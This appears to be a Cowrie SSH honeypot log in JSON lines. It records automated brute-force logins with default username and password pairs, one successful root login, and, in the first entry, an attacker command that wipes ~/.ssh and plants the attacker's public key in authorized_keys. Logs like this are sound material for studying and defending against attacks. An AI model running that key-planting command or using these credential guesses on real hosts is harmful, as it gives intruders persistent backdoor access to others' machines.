{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:23:27.745888Z","src_ip":"129.226.183.73","session":"9db1618ae88a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:23:28.027603Z","src_ip":"129.226.183.73","session":"9db1618ae88a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:28.028712Z","src_ip":"129.226.183.73","session":"9db1618ae88a"}
{"eventid":"cowrie.session.connect","src_ip":"41.74.123.23","src_port":40946,"dst_ip":"1.2.3.4","dst_port":22,"session":"44d2b69b5a05","protocol":"ssh","message":"New connection: 41.74.123.23:40946 (1.2.3.4:22) [session: 44d2b69b5a05]","sensor":"my-vps","timestamp":"2025-08-24T21:23:28.210280Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:28.211438Z","src_ip":"41.74.123.23","session":"44d2b69b5a05"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":38482,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf963dec7cc3","protocol":"ssh","message":"New connection: 129.226.183.73:38482 (1.2.3.4:22) [session: bf963dec7cc3]","sensor":"my-vps","timestamp":"2025-08-24T21:23:28.301278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:23:28.303057Z","src_ip":"129.226.183.73","session":"bf963dec7cc3"}
{"eventid":"cowrie.session.connect","src_ip":"41.74.123.23","src_port":40983,"dst_ip":"1.2.3.4","dst_port":22,"session":"6eb93a49d94a","protocol":"ssh","message":"New connection: 41.74.123.23:40983 (1.2.3.4:22) [session: 6eb93a49d94a]","sensor":"my-vps","timestamp":"2025-08-24T21:23:28.391743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_10.0","message":"Remote SSH version: SSH-2.0-OpenSSH_10.0","sensor":"my-vps","timestamp":"2025-08-24T21:23:28.394346Z","src_ip":"41.74.123.23","session":"6eb93a49d94a"}
{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-24T21:23:28.577690Z","src_ip":"41.74.123.23","session":"6eb93a49d94a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:23:28.585080Z","src_ip":"129.226.183.73","session":"bf963dec7cc3"}
{"eventid":"cowrie.login.failed","username":"a","password":"a","message":"login attempt [a/a] failed","sensor":"my-vps","timestamp":"2025-08-24T21:23:29.347057Z","src_ip":"41.74.123.23","session":"6eb93a49d94a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:23:29.700436Z","src_ip":"129.226.183.73","session":"bf963dec7cc3"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:30.531733Z","src_ip":"41.74.123.23","session":"6eb93a49d94a"}
{"eventid":"cowrie.session.connect","src_ip":"41.74.123.23","src_port":41268,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0974395f049","protocol":"ssh","message":"New connection: 41.74.123.23:41268 (1.2.3.4:22) [session: c0974395f049]","sensor":"my-vps","timestamp":"2025-08-24T21:23:30.806780Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_10.0","message":"Remote SSH version: SSH-2.0-OpenSSH_10.0","sensor":"my-vps","timestamp":"2025-08-24T21:23:30.808810Z","src_ip":"41.74.123.23","session":"c0974395f049"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:30.983391Z","src_ip":"129.226.183.73","session":"bf963dec7cc3"}
{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-24T21:23:30.988762Z","src_ip":"41.74.123.23","session":"c0974395f049"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":39734,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d4aae661ead","protocol":"ssh","message":"New connection: 129.226.183.73:39734 (1.2.3.4:22) [session: 7d4aae661ead]","sensor":"my-vps","timestamp":"2025-08-24T21:23:31.241470Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:23:31.244286Z","src_ip":"129.226.183.73","session":"7d4aae661ead"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:23:31.503692Z","src_ip":"129.226.183.73","session":"7d4aae661ead"}
{"eventid":"cowrie.login.failed","username":"nil","password":"","message":"login attempt [nil/] failed","sensor":"my-vps","timestamp":"2025-08-24T21:23:31.960736Z","src_ip":"41.74.123.23","session":"c0974395f049"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:23:32.546492Z","src_ip":"129.226.183.73","session":"7d4aae661ead"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:32.807445Z","src_ip":"129.226.183.73","session":"9db1618ae88a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:32.808636Z","src_ip":"129.226.183.73","session":"7d4aae661ead"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:33.144196Z","src_ip":"41.74.123.23","session":"c0974395f049"}
{"eventid":"cowrie.session.connect","src_ip":"41.74.123.23","src_port":41539,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b76b162c0ed","protocol":"ssh","message":"New connection: 41.74.123.23:41539 (1.2.3.4:22) [session: 8b76b162c0ed]","sensor":"my-vps","timestamp":"2025-08-24T21:23:33.325369Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_10.0","message":"Remote SSH version: SSH-2.0-OpenSSH_10.0","sensor":"my-vps","timestamp":"2025-08-24T21:23:33.326455Z","src_ip":"41.74.123.23","session":"8b76b162c0ed"}
{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-24T21:23:33.507378Z","src_ip":"41.74.123.23","session":"8b76b162c0ed"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-24T21:23:34.455968Z","src_ip":"41.74.123.23","session":"8b76b162c0ed"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:35.639290Z","src_ip":"41.74.123.23","session":"8b76b162c0ed"}
{"eventid":"cowrie.session.connect","src_ip":"41.74.123.23","src_port":41825,"dst_ip":"1.2.3.4","dst_port":22,"session":"84a335c00126","protocol":"ssh","message":"New connection: 41.74.123.23:41825 (1.2.3.4:22) [session: 84a335c00126]","sensor":"my-vps","timestamp":"2025-08-24T21:23:35.820236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_10.0","message":"Remote SSH version: SSH-2.0-OpenSSH_10.0","sensor":"my-vps","timestamp":"2025-08-24T21:23:35.821147Z","src_ip":"41.74.123.23","session":"84a335c00126"}
{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-24T21:23:36.009480Z","src_ip":"41.74.123.23","session":"84a335c00126"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-24T21:23:36.628525Z","src_ip":"41.74.123.23","session":"84a335c00126"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:37.812184Z","src_ip":"41.74.123.23","session":"84a335c00126"}
{"eventid":"cowrie.session.connect","src_ip":"41.74.123.23","src_port":42061,"dst_ip":"1.2.3.4","dst_port":22,"session":"51a10f616728","protocol":"ssh","message":"New connection: 41.74.123.23:42061 (1.2.3.4:22) [session: 51a10f616728]","sensor":"my-vps","timestamp":"2025-08-24T21:23:38.017253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_10.0","message":"Remote SSH version: SSH-2.0-OpenSSH_10.0","sensor":"my-vps","timestamp":"2025-08-24T21:23:38.018185Z","src_ip":"41.74.123.23","session":"51a10f616728"}
{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-24T21:23:38.199170Z","src_ip":"41.74.123.23","session":"51a10f616728"}
{"eventid":"cowrie.login.failed","username":"orangepi","password":"orangepi","message":"login attempt [orangepi/orangepi] failed","sensor":"my-vps","timestamp":"2025-08-24T21:23:39.061637Z","src_ip":"41.74.123.23","session":"51a10f616728"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:40.243851Z","src_ip":"41.74.123.23","session":"51a10f616728"}
{"eventid":"cowrie.session.connect","src_ip":"41.74.123.23","src_port":42354,"dst_ip":"1.2.3.4","dst_port":22,"session":"02074f956641","protocol":"ssh","message":"New connection: 41.74.123.23:42354 (1.2.3.4:22) [session: 02074f956641]","sensor":"my-vps","timestamp":"2025-08-24T21:23:40.599597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_10.0","message":"Remote SSH version: SSH-2.0-OpenSSH_10.0","sensor":"my-vps","timestamp":"2025-08-24T21:23:40.600741Z","src_ip":"41.74.123.23","session":"02074f956641"}
{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-24T21:23:40.796051Z","src_ip":"41.74.123.23","session":"02074f956641"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-08-24T21:23:41.390028Z","src_ip":"41.74.123.23","session":"02074f956641"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:42.577574Z","src_ip":"41.74.123.23","session":"02074f956641"}
{"eventid":"cowrie.session.connect","src_ip":"41.74.123.23","src_port":42604,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0bd9e736333","protocol":"ssh","message":"New connection: 41.74.123.23:42604 (1.2.3.4:22) [session: d0bd9e736333]","sensor":"my-vps","timestamp":"2025-08-24T21:23:42.758156Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_10.0","message":"Remote SSH version: SSH-2.0-OpenSSH_10.0","sensor":"my-vps","timestamp":"2025-08-24T21:23:42.759451Z","src_ip":"41.74.123.23","session":"d0bd9e736333"}
